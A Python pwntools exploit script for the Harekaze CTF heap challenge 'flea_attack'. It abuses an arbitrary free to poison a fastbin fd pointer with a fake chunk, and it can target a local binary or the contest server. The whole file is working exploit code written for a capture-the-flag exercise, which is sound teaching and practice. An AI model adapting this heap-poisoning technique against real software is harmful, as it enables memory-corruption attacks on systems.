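#!/usr/bin/env python3
"""Exploit for the Harekaze CTF heap challenge "flea_attack" (local process by default).

How the script drives the target (menu "1" = allocate a chunk of a requested
size and fill it, the program then echoes the address after "Addr: ";
menu "2" = free whatever address the user types as hex -- that arbitrary
free is the primitive in play):

  1. allocate 50 bytes and plant a fake chunk header inside the allocation:
     the qword at user offset 0x18 is 0x21 (size 0x20 | PREV_INUSE), so
     base+0x20 looks like the user pointer of a 0x20-byte chunk;
  2. read the real chunk's address from the "Addr: " line;
  3. free base+0x20 (fake chunk -> 0x20 fastbin), then base itself
     (real chunk -> 0x40 fastbin);
  4. allocate 50 bytes again -- malloc hands `base` back -- and write the same
     header followed by one extra qword, which overlays the fake chunk's
     fastbin fd with FAKE_FD;
  5. hand the tube to the operator; the allocations that cash in the poisoned
     fd are done by hand in the interactive session.

Ported from the Python 2 original to Python 3 / pwntools >= 4.  Every byte
sent on the wire is identical to the original script; `--remote` on the
command line selects the CTF server instead of a local process.
"""
import struct
import sys

BINARY = "./flea_attack.elf"
REMOTE = ("problem.harekaze.com", 20175)
ALLOC_SIZE = b"50"        # request size; the resulting 0x40 chunk has room for the fake 0x20 chunk
FAKE_CHUNK_OFFSET = 0x20  # fake chunk's user pointer, relative to the real chunk's user pointer

# Value written over the fake chunk's fastbin fd.  The original author notes
# it "must be a valid chunk header": malloc only returns FAKE_FD as the next
# 0x20 allocation if the size qword at FAKE_FD+8 decodes to the 0x20 fastbin
# class, otherwise it aborts on the fastbin size check.  The value looks like
# an image offset and is sent as-is, so the script assumes the binary sits at
# a fixed load address (non-PIE) -- confirm against the target.
FAKE_FD = 0x203FF8


def p64(value):
    """Pack `value` as a little-endian unsigned 64-bit qword (stdlib stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


def fake_chunk_payload(fd=None):
    """Return the bytes written into the 50-byte allocation.

    Layout, offsets relative to the allocation's user pointer `base`:
      0x00  b"blahblah"  filler
      0x08  0            fake chunk's prev_size
      0x10  0            padding
      0x18  0x21         fake chunk's size field (0x20 | PREV_INUSE)
      0x20  fd           fake chunk's fastbin fd -- only present when `fd` is given

    Args:
        fd: qword to place at offset 0x20, or None for the 32-byte header-only
            payload used by the first allocation.

    Returns:
        32 bytes without `fd`, 40 bytes with it.
    """
    words = [b"blahblah", p64(0), p64(0), p64(0x21)]
    if fd is not None:
        words.append(p64(fd))
    return b"".join(words)


def free_at(tube, addr):
    """Menu option 2: ask the target to free the user pointer `addr`.

    The address is sent as bare lowercase hex with no 0x prefix, exactly as
    the original script did; the target is trusted to parse it that way.
    """
    tube.recvuntil(b">")
    tube.sendline(b"2")
    tube.recv()
    tube.sendline(b"%x" % addr)


def main():
    import pwn  # pwntools; imported here so the payload helpers stay importable without it

    if "--remote" in sys.argv[1:]:
        tube = pwn.remote(*REMOTE)
    else:
        tube = pwn.process(BINARY)
        input("<ATTACH NOW>")  # pause so a debugger can attach before the heap is touched

    tube.recv()
    tube.sendline(b"")  # reply to the first prompt; the original author treats it as irrelevant

    # Steps 1+2: allocate, plant the fake header, read the chunk address.
    tube.recvuntil(b">")
    tube.sendline(b"1")
    tube.recv()
    tube.sendline(ALLOC_SIZE)
    tube.sendline(fake_chunk_payload())
    tube.recvuntil(b"Addr: ")
    base = int(tube.recvuntil(b"\n").rstrip(), 16)
    print(" ADDRESS OF CHUNK AT: %x" % base)
    input("<STOP>")  # second debugger checkpoint, before the frees

    # Step 3: free the fake chunk first, then the real one that contains it.
    # NOTE(review): free() also sanity-checks the size of the chunk that follows
    # the fake one (base+0x38); with nothing else allocated that is the top
    # chunk's size, which passes -- re-check if the heap layout changes.
    fake = base + FAKE_CHUNK_OFFSET
    print(" FREEING CHUNK at %x" % fake)
    free_at(tube, fake)
    free_at(tube, base)

    # Step 4: reallocating the same size returns `base`; the extra qword of the
    # payload lands on the fake chunk's fd at base+0x20.
    tube.recvuntil(b">")
    print("ALLOCATING FIRST CHUNK WITH OVERWRITE")
    tube.sendline(b"1")
    tube.sendline(ALLOC_SIZE)
    tube.sendline(fake_chunk_payload(FAKE_FD))

    # Step 5: the remaining allocations are driven by hand.
    tube.interactive()


if __name__ == "__main__":
    main()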